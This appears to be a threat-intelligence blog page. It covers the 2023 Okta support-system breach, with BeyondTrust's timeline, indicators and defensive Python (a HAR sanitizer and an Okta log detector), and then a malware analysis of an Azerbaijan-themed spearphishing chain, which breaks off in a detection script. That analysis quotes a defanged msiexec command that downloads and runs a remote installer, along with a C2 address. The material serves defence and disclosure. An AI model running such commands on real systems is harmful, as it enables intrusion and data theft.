<p>Clorox's cyberattack is just one of many recent incidents highlighting the growing security risks associated with global supply chains. As companies increasingly rely on third-party vendors and suppliers, their attack surfaces expand, making them more vulnerable to malicious actors. In the case of Clorox, the cyberattack disrupted the company's ability to deliver products to its customers, causing significant financial losses. The attack also exposed sensitive customer data, potentially damaging the company's reputation and customer trust.</p>
<p>With increasing global cybersecurity threats, the role of the CISO has become increasingly important. CISOs are responsible for overseeing and managing a company's cybersecurity program, which includes protecting its networks, data, and systems from cyberattacks.</p>
<p>In today's complex and interconnected world, CISOs need to think strategically, communicate effectively with senior management, and have a deep understanding of cybersecurity technologies and best practices. They also need to be able to build and manage a team of skilled cybersecurity professionals despite very challenging workforce dynamics. CISOs will also be asked to take on the burden of personal risk and liability in this position.</p>
<p>The October Okta Hit (<a href="https://redskyalliance.org/xindustry/the-october-okta-hit">https://redskyalliance.org/xindustry/the-october-okta-hit</a>), 2023-10-23, Jim McKee (<a href="https://redskyalliance.org/members/JimMcKee">https://redskyalliance.org/members/JimMcKee</a>)</p>
<div><p>Okta Security has identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases. It should be noted that the Okta support case management system is separate from the production Okta service, which is fully operational and has not been impacted. In addition, the Auth0/CIC case management system is not impacted by this incident.</p>
<p>Note: All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.</p>
<p>Within the course of normal business, Okta support will ask customers to upload an HTTP Archive (HAR) file, which allows for troubleshooting of issues by replicating browser activity. HAR files can also contain sensitive data, including cookies and session tokens, that malicious actors can use to impersonate valid users. Okta has worked with impacted customers to investigate, and has taken measures to protect our customers, including the revocation of embedded session tokens. In general, Okta recommends sanitizing all credentials and cookies/session tokens within a HAR file before sharing it.<a href="#_ftn1">[1]</a></p>
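<p>The sanitization Okta recommends above, as an added example (not Okta's or BeyondTrust's code): a scrubber for the HAR 1.2 layout that redacts Cookie/Set-Cookie/Authorization headers, parsed cookies, token-named query parameters and JWT-shaped strings in request and response bodies, then re-checks the result before anything is written out. The sample HAR entry is constructed.</p>

```python
"""Sanitize a HAR 1.2 file (log.entries[].request/.response) before sharing it
with a support desk. Added example, not Okta's or BeyondTrust's code; SAMPLE_HAR
is constructed."""
import copy
import json
import re

REDACTED = "[REDACTED]"
# Header names that always carry credentials or session material.
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "proxy-authorization"}
# Name fragments that mark any other header or query parameter as sensitive.
SENSITIVE_HINTS = ("token", "session", "secret", "password", "apikey", "api_key", "api-key")
# Three-part base64url string: the shape of JWT session/ID/access tokens in bodies.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def is_sensitive_name(name):
    n = name.lower()
    return n in SENSITIVE_HEADERS or any(h in n for h in SENSITIVE_HINTS)

def _scrub_pairs(pairs):
    """Redact the value of every {name, value} pair whose name is sensitive."""
    hits = 0
    for p in pairs or []:
        if is_sensitive_name(p.get("name", "")) and p.get("value") != REDACTED:
            p["value"] = REDACTED
            hits += 1
    return hits

def _scrub_cookies(cookies):
    """HAR keeps parsed cookies apart from the Cookie header; redact every value."""
    hits = 0
    for c in cookies or []:
        if c.get("value") not in (None, "", REDACTED):
            c["value"] = REDACTED
            hits += 1
    return hits

def _scrub_body(container):
    """Replace JWT-shaped strings in postData.text or content.text."""
    if not container or not container.get("text"):
        return 0
    container["text"], n = JWT_RE.subn(REDACTED, container["text"])
    return n

def sanitize_har(har):
    """Return (sanitized deep copy, number of redactions); the input is untouched."""
    har = copy.deepcopy(har)
    count = 0
    for entry in har.get("log", {}).get("entries", []):
        req, resp = entry.get("request", {}), entry.get("response", {})
        count += _scrub_pairs(req.get("headers")) + _scrub_pairs(req.get("queryString"))
        count += _scrub_cookies(req.get("cookies")) + _scrub_body(req.get("postData"))
        count += _scrub_pairs(resp.get("headers")) + _scrub_cookies(resp.get("cookies"))
        count += _scrub_body(resp.get("content"))
    return har, count

def residual_secrets(har):
    """Independent re-check before upload: list anything that still looks secret."""
    leftovers = []
    for i, entry in enumerate(har.get("log", {}).get("entries", [])):
        for side in ("request", "response"):
            part = entry.get(side, {})
            leftovers += [(i, side, "header", p.get("name")) for p in part.get("headers", [])
                          if is_sensitive_name(p.get("name", "")) and p.get("value") != REDACTED]
            leftovers += [(i, side, "cookie", c.get("name")) for c in part.get("cookies", [])
                          if c.get("value") not in (None, "", REDACTED)]
        if JWT_RE.search(json.dumps(entry)):  # catches tokens in URLs and bodies alike
            leftovers.append((i, "any", "jwt", None))
    return leftovers

def sanitize_har_file(path_in, path_out):
    """Sanitize a HAR on disk; refuse to write it if the re-check still finds secrets."""
    with open(path_in, encoding="utf-8") as f:
        har = json.load(f)
    clean, count = sanitize_har(har)
    leftovers = residual_secrets(clean)
    if leftovers:
        raise ValueError(f"secrets remain after sanitization: {leftovers}")
    with open(path_out, "w", encoding="utf-8") as f:
        json.dump(clean, f, indent=2)
    return count

# Constructed HAR entry of the kind the incident describes: an admin API call
# carrying the session cookie, and a response body holding a token.
SAMPLE_HAR = {"log": {"version": "1.2", "entries": [{
    "request": {"method": "GET", "url": "https://example.okta.com/api/v1/users?limit=20",
                "headers": [{"name": "Cookie", "value": "sid=CONSTRUCTED-SESSION-ID"},
                            {"name": "Accept", "value": "application/json"}],
                "queryString": [{"name": "limit", "value": "20"}],
                "cookies": [{"name": "sid", "value": "CONSTRUCTED-SESSION-ID"}]},
    "response": {"status": 200,
                 "headers": [{"name": "Set-Cookie", "value": "sid=CONSTRUCTED-SESSION-ID; Secure"},
                             {"name": "Content-Type", "value": "application/json"}],
                 "cookies": [{"name": "sid", "value": "CONSTRUCTED-SESSION-ID"}],
                 "content": {"mimeType": "application/json",
                             "text": "{\"sessionToken\":\"eyJhbGciOi.eyJzdWIi.c2ln\"}"}}}]}}
```

<p>For a real capture, <code>sanitize_har_file(path_in, path_out)</code> is the entry point; it raises instead of writing a file that still carries a cookie or token.</p>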
<p>Attacks such as this highlight the importance of remaining vigilant and being on the lookout for suspicious activity. We are sharing the following Indicators of Compromise to assist customers who wish to perform their own threat hunting activity. We recommend referring to our previously published advice on how to search System Log for any given suspicious session, user or IP. Please note that the majority of the indicators are commercial VPN nodes according to our enrichment information.</p>
<p>User-Agents - While the following user-agents are legitimate, they may be rare in your environment given the release of Chrome 99 in March 2022.</p>
<p>Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 (Legitimate, but older user-agent)</p>
<p>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36 (Legitimate, but older user-agent)</p>
<p>Analysis:<a href="#_ftn2">[2]</a></p>
<p>On 2 October 2023, the BeyondTrust security teams detected an identity-centric attack on an in-house Okta administrator account. The team immediately detected and remediated the attack through our own Identity Security tools, resulting in no impact or exposure to BeyondTrust’s infrastructure or to our customers. The incident was the result of Okta’s support system being compromised which allowed an attacker to access sensitive files uploaded by their customers.</p>
<p>The incident began when BeyondTrust security teams detected an attacker trying to access an in-house Okta administrator account using a valid session cookie stolen from Okta’s support system. Custom policy controls blocked the attacker's initial activity, but limitations in Okta's security model allowed them to perform a few confined actions. BeyondTrust’s own Identity Security Insights tool alerted the team to the attack, and they were able to block all access and verify that the attacker did not gain access to any systems.</p>
<p>The initial incident response indicated a possible compromise at Okta, of either someone on their support team or someone in a position to access customer support-related data. Concerns were raised regarding a breach at Okta on 2 October. Having received no acknowledgement from Okta of a possible breach, analysts persisted with escalations within Okta until 19 October, when Okta security leadership notified BeyondTrust that they had indeed experienced a breach and we were one of their affected customers.</p>
<p>Okta has now issued a statement confirming the breach that we detected nearly three weeks ago. Again, while there was no exposure to BeyondTrust or our customers, analysts are sharing details of the attack to educate other Okta users and infosec professionals. For BeyondTrust customers who leverage our Identity Security Insights product, experts have also outlined the various detections that would alert you to this type of attack and recommendations to better control your attack surface and limit the possibility and impact of Okta-focused attacks.</p>
<p>Timeline Overview</p>
<p>2 October 2023 – Detected and remediated identity centric attack on an in-house Okta administrator account and alerted Okta.</p>
<p>3 October 2023 – Asked Okta support to escalate to Okta security team given initial forensics pointing to a compromise within Okta support organization.</p>
<p>11 October 2023 and 13 October 2023 – Investigators held Zoom sessions with the Okta security team to explain why we believed they might be compromised.</p>
<p>19 October 2023 – Okta security leadership confirmed they had an internal breach, and BeyondTrust was one of their affected customers.</p>
<p>Attack Details:</p>
<p>On 2 October 2023, an Okta support agent requested a BeyondTrust Okta administrator generate a HAR file to assist in resolving an ongoing support issue the administrator was working on. HAR files are HTTP archives that can be generated by a web browser to log interactions with a website, in this case used for debugging an issue with the site. The administrator complied with the request and generated a HAR file containing an API request and a session cookie which was uploaded to the Okta support portal.</p>
<p>The Okta administrator’s account was protected with FIDO2 authentication, and policies within BeyondTrust’s Okta only allowed access to the admin console from managed devices with Okta Verify installed.</p>
<p>Within 30 minutes of the administrator uploading the file to Okta’s support portal, an attacker used the session cookie from this support ticket, attempting to perform actions in the BeyondTrust Okta environment. BeyondTrust’s custom policies around admin console access initially blocked them, but they pivoted to using admin API actions authenticated with the stolen session cookie. API actions cannot be protected by policies in the same way as actual admin console access. Using the API, they created a backdoor user account with a naming convention mimicking existing service accounts.</p>
<p>Our own instance of BeyondTrust’s Identity Security Insights, and tailored detections from our security teams, alerted us to several aspects of the intrusion. Analysts immediately disabled the backdoor user account and revoked the attacker’s access before the account could be used, preventing any further actions. They saw no evidence of other irregular activity across all other privileged Okta users in Identity Security Insights, no evidence of other suspicious Okta accounts being created, and no evidence of any unusual activity in the targeted user’s account before this incident.</p>
<p>Detailed Attack Timeline - Below is the detailed timeline of events:</p>
<p>2 October 2023 - A BeyondTrust Okta administrator uploads a browser recording (HAR file) at the request of Okta support related to ongoing troubleshooting of a non-security related support issue.</p>
<p>Within 30 minutes of the support file upload, there was an attempt to access the BeyondTrust Okta admin console as the BeyondTrust Okta administrator, using an IP address in Malaysia linked to anonymizing proxy/VPN services. Okta events are logged from this <u>Malaysian IP</u>; however, there were no prior authentication events or activity from this user in this location, as we would normally expect.</p>
<p>Attacker was authenticated, but access to the Okta console was denied due to a non-default Okta security policy configuration enforced by BeyondTrust security teams:</p>
<ul>
<li>Default deny access and only allow access if specific criteria are met.</li>
<li>Attacker denied console access due to policy requirement of requiring Okta Verify on a managed device.</li>
<li>Attacker attempts to generate a password health report using the underlying API of the Okta admin console.</li>
<li>The attacker attempts to gain access to main Okta dashboard but receives a policy challenge.</li>
</ul>
<p>Note: It is important for Okta customers to enhance security policies through settings such as prompting admin users for MFA at every sign-in. While this was within an existing session the attacker hijacked, Okta still views dashboard access as a new sign-in and prompts for MFA.</p>
<p>The attacker uses the official Okta API to create a fake service account named “svc_network_backup” to make it look like existing service accounts.</p>
<p>Note: Session cookies can be used to authenticate to the official Okta API, and in many cases these lack the policy restrictions that apply to the interactive admin console.</p>
<p>The attacker acted quickly, but detections and responses were immediate, disabling the account and mitigating any potential exposure. BeyondTrust initiated an incident response process, immediately isolating and forensically investigating all systems and accounts associated with the administrator.</p>
<p>The investigation did not discover any indication of compromise; however, it did uncover the HAR file that had been generated for the support case. This was notable, as these are only created in exceptional circumstances, in this instance for troubleshooting a support case. BeyondTrust contacted Okta support to inform them of our concerns while we continued to investigate.</p>
<p>3 October 2023 - Further investigation ruled out the possibility that the compromise originated from a BeyondTrust system, leading us to conclude the Okta support system was likely compromised. BeyondTrust requested Okta support to escalate to their information security team, given our concern that Okta was likely compromised and other Okta customers might be exposed. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>11 October 2023 - Okta Support Zoom meeting with a member of their information security team where we shared our findings and requested additional log data from Okta related to support case data access. Okta committed to providing the requested logs and working with us. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>13 October 2023 - Okta support logs were received but contained several discrepancies. BeyondTrust requested more detailed logs relating to the discrepancies and reiterated concerns that there was a high likelihood of compromise within Okta support and that we were likely not the only customer impacted. No known compromise or ongoing security incident was communicated by Okta.</p>
<p>19 October 2023 - Call with Okta Security Leadership who notified investigators that there was a breach at Okta and we were one of the customers exposed during that breach.</p>
<p>20 October 2023 - Coinciding with Okta’s public announcement, a decision was made to publish this blog with detailed information including indicators of compromise to provide information to the security community and protect mutual customers. </p>
<p>BeyondTrust would like to thank Okta for working with us to protect mutual customers. We appreciate their transparency in reporting this breach, notifying affected customers, and highlighting further investigative steps.</p>
<p>Identity Security Insights Detections Specific to this Discovery - The following are detections and recommendations available within BeyondTrust’s Identity Security Insights solution that would have triggered for Insights customers if they were targeted by the techniques used in this Okta attack.</p>
<p>Okta session hijacking: Attackers steal Okta session cookies and use them to access Okta from infrastructure they control, allowing them to bypass most MFA and security controls related to authentication. This detection looks for suspicious sessions appearing without an authentication event that are consistent with session hijacking.</p>
<p>Okta user performed administrative action using a proxy: This attacker, and other Okta-focused attackers like <strong>Scattered Spider</strong>, often use proxies to log in as privileged users and perform sensitive administrative actions, but legitimate users rarely do.</p>
<p>Okta admin privileges were granted to a user: Attackers often attempt to escalate privilege, or grant privilege to backdoor accounts. This information-level detection highlights all Okta admin assignments. These assignments are typically rare and usually occur within an established process.</p>
<p>Okta password health report generated: This report is generated rarely in most environments we monitor. This information-level detection highlights when that happens in case the activity is suspicious.</p>
<p>Okta user with some level of admin access uses MFA vulnerable to SIM swapping: Our incident response process was significantly faster because the admin user used FIDO2 for MFA, allowing us to rule out attacker-in-the-middle phishing as the mechanism for the token theft. Posture recommendations for privileged users give identity security professionals incremental changes they can make to better protect these crucial accounts. </p>
<p>If you are currently using <u>Insights</u>, please review your findings for any applicable detections based on the details below and feel free to reach out to BeyondTrust Support for help reviewing your own environment’s potential exposure from Okta’s breach. If you are not currently an Identity Security Insights customer but would like to leverage our free trial to assess your environment, please contact us.</p>
<p>Indicators of Compromise:</p>
<ul>
<li>Access to Okta admin functions through proxy (isproxy: true in Okta log events)</li>
<li>Access to Okta from IPs 202[.]59.10.100 or 23[.].105.182.19</li>
<li>Access to Okta, especially Okta admin functions, from VPS/hosting providers. (Especially: VPS Malaysia, LeaseWeb.)</li>
<li>Access to Okta with this user agent for an outdated version of Chrome for macOS: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36</li>
<li>Okta account created via REST API with name svc_network_backup, or another name mimicking existing, legitimate accounts.</li>
<li>Activity against endpoints like /reports/password-health/async_csv_download_schedule?, which are typically used from Okta Admin Console UI only, without any corresponding admin console login</li>
<li>Okta activity for a user without any clear indication that the user authenticated (e.g. a user.session.start event for that user from a similar geographic area)</li>
<li>Admin console login attempts that are denied by policy without a subsequent successful login to admin console from the same user within an hour</li>
</ul>
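<p>A detection pass over constructed Okta System Log events, added here as an example (it is not BeyondTrust's Identity Security Insights code or anything from Okta) for the detections and indicators listed above. It assumes the Okta field paths named in the docstring and a hypothetical, short set of admin-only event types; the log events are made up.</p>

```python
"""Detections for the Okta session-hijacking pattern and indicators listed
above, run over constructed Okta System Log events. Added example, not
BeyondTrust's or Okta's code. Field paths (actor.alternateId, client.ipAddress,
client.userAgent.rawUserAgent, securityContext.isProxy, outcome.result,
debugContext.debugData.requestUri) follow Okta's System Log schema; the
events themselves are made up for this example."""
from datetime import datetime, timedelta

# Indicators copied from the list above. The second IP on that list is left out
# because its defanged form on the page is malformed; add your own values here.
IOC_IPS = {"202.59.10.100"}
IOC_USER_AGENT = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36")
ADMIN_APP = "user.session.access_admin_app"      # admin console sign-in event
SESSION_START = "user.session.start"
# Event types only an administrator can produce (assumption: a small subset of
# Okta's eventType vocabulary, chosen for this example; extend to taste)
ADMIN_EVENTS = {ADMIN_APP, "user.account.privilege.grant",
                "user.lifecycle.create", "system.api_token.create"}
REPORT_URI = "/reports/password-health"


def _ts(ev):
    return datetime.fromisoformat(ev["published"].replace("Z", "+00:00"))


def _get(ev, *path):
    for key in path:
        if not isinstance(ev, dict) or key not in ev:
            return None
        ev = ev[key]
    return ev


def detect(events, window=timedelta(hours=1)):
    """Return (rule, actor, published) findings, in time order.
    Authentication state is keyed on (actor, source IP): a cookie replayed from
    new infrastructure then has no matching user.session.start, which is the
    'no clear indication the user authenticated' signal described above."""
    findings = []
    session_start = {}   # (actor, ip) -> time of last successful session start
    console_ok = set()   # (actor, ip) pairs with a successful admin console login
    pending_deny = {}    # actor -> time of an admin console DENY not yet resolved
    for ev in sorted(events, key=_ts):
        actor = _get(ev, "actor", "alternateId")
        ip = _get(ev, "client", "ipAddress")
        etype = ev.get("eventType", "")
        when = _ts(ev)
        result = _get(ev, "outcome", "result")
        uri = _get(ev, "debugContext", "debugData", "requestUri") or ""
        if ip in IOC_IPS or _get(ev, "client", "userAgent", "rawUserAgent") == IOC_USER_AGENT:
            findings.append(("ioc_match", actor, when))
        if etype == SESSION_START and result == "SUCCESS":
            session_start[(actor, ip)] = when
            continue
        # Any other activity needs a recent session start from the same source
        started = session_start.get((actor, ip))
        if started is None or when - started > window:
            findings.append(("activity_without_session_start", actor, when))
        if etype in ADMIN_EVENTS and _get(ev, "securityContext", "isProxy"):
            findings.append(("admin_action_via_proxy", actor, when))
        if etype == ADMIN_APP:
            if result == "DENY":
                pending_deny.setdefault(actor, when)
            elif result == "SUCCESS":
                console_ok.add((actor, ip))
                if actor in pending_deny and when - pending_deny[actor] <= window:
                    del pending_deny[actor]
        # Report endpoints are driven from the admin console UI; hitting one from
        # a source that never signed in to the console is the API-replay pattern
        if uri.startswith(REPORT_URI) and (actor, ip) not in console_ok:
            findings.append(("report_endpoint_without_console_login", actor, when))
    # Denies never followed by a success within the window (in streaming use,
    # emit these once the window has elapsed rather than at end of batch)
    for actor, when in pending_deny.items():
        findings.append(("admin_console_denied_without_success", actor, when))
    return findings


def _event(published, actor, etype, ip, *, proxy=False,
           ua="Mozilla/5.0 (constructed)", uri="", result="SUCCESS"):
    return {"published": published, "eventType": etype,
            "actor": {"alternateId": actor},
            "client": {"ipAddress": ip, "userAgent": {"rawUserAgent": ua}},
            "securityContext": {"isProxy": proxy},
            "outcome": {"result": result},
            "debugContext": {"debugData": {"requestUri": uri}}}


# Constructed log: a legitimate admin session, then the same user's cookie
# replayed from the listed proxy IP against the admin console and the REST API
SAMPLE_EVENTS = [
    _event("2023-10-02T09:00:00Z", "admin@example.com", SESSION_START, "203.0.113.5"),
    _event("2023-10-02T09:05:00Z", "admin@example.com", ADMIN_APP, "203.0.113.5"),
    _event("2023-10-02T10:12:00Z", "admin@example.com", ADMIN_APP, "202.59.10.100",
           proxy=True, ua=IOC_USER_AGENT, result="DENY"),
    _event("2023-10-02T10:15:00Z", "admin@example.com", "user.lifecycle.create",
           "202.59.10.100", proxy=True, ua=IOC_USER_AGENT, uri="/api/v1/users"),
    # eventType below is constructed; the rule matches on requestUri only
    _event("2023-10-02T10:20:00Z", "admin@example.com", "report.password_health.generate",
           "202.59.10.100", proxy=True, ua=IOC_USER_AGENT,
           uri="/reports/password-health/async_csv_download_schedule"),
]
```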
<p>Other Notes - Okta have recently updated their KB articles relating to the creation and sanitization of HAR files; we recommend reviewing these. We did not see any failed attempts to use the stolen session after its expiration, but this may be because actions attempted with expired sessions do not appear in Okta logs.</p>
<p>Recommended Posture Improvements:</p>
<ul>
<li>Add policy controls in Okta to restrict access to admin console.</li>
<li>Consider adjusting the Okta global session policy to issue an MFA challenge at every sign-on, which will prevent attackers with a stolen cookie from accessing the main dashboard.</li>
<li>Limit the length of Okta sessions and take other steps to reduce the window during which a stolen cookie can be used.</li>
<li>Be aware that admin API actions authenticated via session cookie are only covered by the Global Session Policy, which is often less restrictive than other policies.</li>
<li>Be aware that session hijacking allows attackers to bypass MFA.</li>
<li>Require strong hardware MFA for all Okta admins to prevent token hijacking via attacker-in-the-middle phishing.</li>
</ul>
<p>Closing Thoughts - Modern identity-based attacks can be complex and, as this attack shows, can originate from environments outside your own. Good, specific policies and internal controls are necessary to limit things like how HAR files are shared. Defense in depth is important, though: the failure of a single control or process should not result in a breach. Here, multiple layers of controls (Okta sign-on controls, identity security monitoring, and so on) prevented a breach.</p>
<p><a href="https://www.beyondtrust.com/blog/entry/lessons-in-okta-security">https://www.beyondtrust.com/blog/entry/lessons-in-okta-security</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://sec.okta.com/harfiles">https://sec.okta.com/harfiles</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.beyondtrust.com/blog/entry/okta-support-unit-breach">https://www.beyondtrust.com/blog/entry/okta-support-unit-breach</a></p></div>Azerbaijan & Armenia Cyber Meddlinghttps://redskyalliance.org/xindustry/azerbaijan-armenia-cyber-meddling2023-10-04T16:00:00.000Z2023-10-04T16:00:00.000ZCyberDoghttps://redskyalliance.org/members/CyberDog189<div><p><em><a href="{{#staticFileLink}}12239425294,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12239425294,RESIZE_400x{{/staticFileLink}}" width="250" alt="12239425294?profile=RESIZE_400x" /></a></em><a href="https://www.cfr.org/global-conflict-tracker/conflict/nagorno-karabakh-conflict">In 1923</a>, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh intended to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, <a href="https://www.reuters.com/world/us-calls-azerbaijan-halt-karabakh-attack-russia-urges-return-ceasefire-2023-09-20/">tensions remain high</a> between the two countries.</p>
<p><strong>Affected platforms: </strong>Microsoft Windows<br /> <strong>Impacted parties: </strong>Targeted management associated with an Azerbaijani company<br /> <strong>Impact: </strong>Reconnaissance of basic computer info of targeted users<br /> <strong>Severity level: </strong>Low</p>
<p>A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict - In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.<a href="#_ftn1">[1]</a></p>
<p><em><br /> <a href="{{#staticFileLink}}12239426061,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426061,RESIZE_584x{{/staticFileLink}}" width="457" alt="12239426061?profile=RESIZE_584x" /></a>Figure 2. Memo</em></p>
<p>This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.</p>
<p>Anatomy of an Attack - FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.</p>
<p><br /> <a href="{{#staticFileLink}}12239426082,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426082,RESIZE_584x{{/staticFileLink}}" width="493" alt="12239426082?profile=RESIZE_584x" /></a><em>Figure 3. Attack flow</em></p>
<p>The memo is in HTML format and uses <a href="https://attack.mitre.org/techniques/T1027/006/">HTML smuggling</a> to deliver a password-protected archive automatically. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.</p>
<p><em><a href="{{#staticFileLink}}12239426252,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426252,RESIZE_710x{{/staticFileLink}}" width="598" alt="12239426252?profile=RESIZE_710x" /></a>Figure 4. Contents of the zip archive with parts obfuscated for PII purposes</em></p>
<p>An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:</p>
<p>..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi? rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"</p>
<p>This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked. The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):</p>
<p><em><a href="{{#staticFileLink}}12239426271,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426271,RESIZE_584x{{/staticFileLink}}" width="578" alt="12239426271?profile=RESIZE_584x" /></a>Figure 5. The phony image is shown when the .LNK shortcut is executed</em></p>
<p>This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection. Instead, the installer simultaneously loads hidden malware into the targeted computer.</p>
<p>Malware - The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:</p>
<p>C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe</p>
<p>Uncommon Traits - This malware is programmed in Rust, which is not the programming language of choice for most malware authors. This makes standard analysis tools and methods somewhat less useful. The use of Rust already sets this threat actor apart. However, this is not the only trait that makes this malware distinct.</p>
<p>For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.</p>
<p><em><a href="{{#staticFileLink}}12239426860,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239426860,RESIZE_710x{{/staticFileLink}}" width="624" alt="12239426860?profile=RESIZE_710x" /></a>Figure 6. Scheduled task</em></p>
<p>Once the scheduled task is created, the .XML file is deleted.</p>
<p>This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.</p>
<p><em><a href="{{#staticFileLink}}12239427856,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239427856,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239427856?profile=RESIZE_710x" /></a>Figure 7. Sleep between 10 and 20 minutes</em></p>
<p>Next, we refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice that the memo is dated August 8<sup>th</sup>. By examining its compile timestamp, we found that the malware was created the previous day.</p>
<p><em><a href="{{#staticFileLink}}12239428695,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12239428695,RESIZE_710x{{/staticFileLink}}" width="623" alt="12239428695?profile=RESIZE_710x" /></a>Figure 8. Creation time of the malware</em></p>
<p>This short timeframe makes it virtually impossible for the malware to be released accidentally before the attack starts.</p>
<p>Stealing Information - Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:</p>
<p><em><a href="{{#staticFileLink}}12239428071,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239428071,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239428071?profile=RESIZE_710x" /></a><a href="{{#staticFileLink}}12239429656,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429656,RESIZE_710x{{/staticFileLink}}" width="632" alt="12239429656?profile=RESIZE_710x" /></a>Figure 9. Commands executed by the malware</em></p>
<p>These commands suggest that the threat actor is still in the early stages of fully attempting to compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.</p>
<p>This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.</p>
<p><em><a href="{{#staticFileLink}}12239429473,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429473,RESIZE_710x{{/staticFileLink}}" width="621" alt="12239429473?profile=RESIZE_710x" /></a>Figure 10. Checking for proxy</em></p>
<p>If a proxy server is set, the malware understands how to route its traffic. The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.</p>
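<p>Endpoint-side detection for the chain just described (msiexec fetching a remote .msi, the image-named double-extension lure, the Defender-lookalike drop under %APPDATA%, and a scheduled task registered from a temporary XML), added here as an example that is not Fortinet's code. The events are constructed Sysmon-style records, and the assumption that schtasks.exe consumed the XML is mine; the article only says the temporary file was used to create the task.</p>

```python
"""Endpoint detections for the attack chain described above: a LNK that runs
msiexec against a remote .msi named like an image, an executable dropped under
%APPDATA% in a folder borrowing Microsoft Defender's name, and a scheduled task
registered from a temporary XML. Added example, not Fortinet's code. Events are
constructed Sysmon-style records (EventID 1 = process create, EventID 11 = file
create); only the field names mirror Sysmon, nothing here reads a live log."""
import re

# Decoy extension in front of the real one, as in karabakh.jpg.msi on this page
DOUBLE_EXT = re.compile(r"\.(?:jpe?g|png|gif|pdf|docx?)\.(?:msi|lnk|exe|html?)\b", re.I)
# msiexec /i pointed at a URL: the installer is fetched over the network
REMOTE_MSI = re.compile(r'(?:^|\s)/i\s+"?https?://', re.I)
# Executable under the roaming profile in a Defender-named folder; the real
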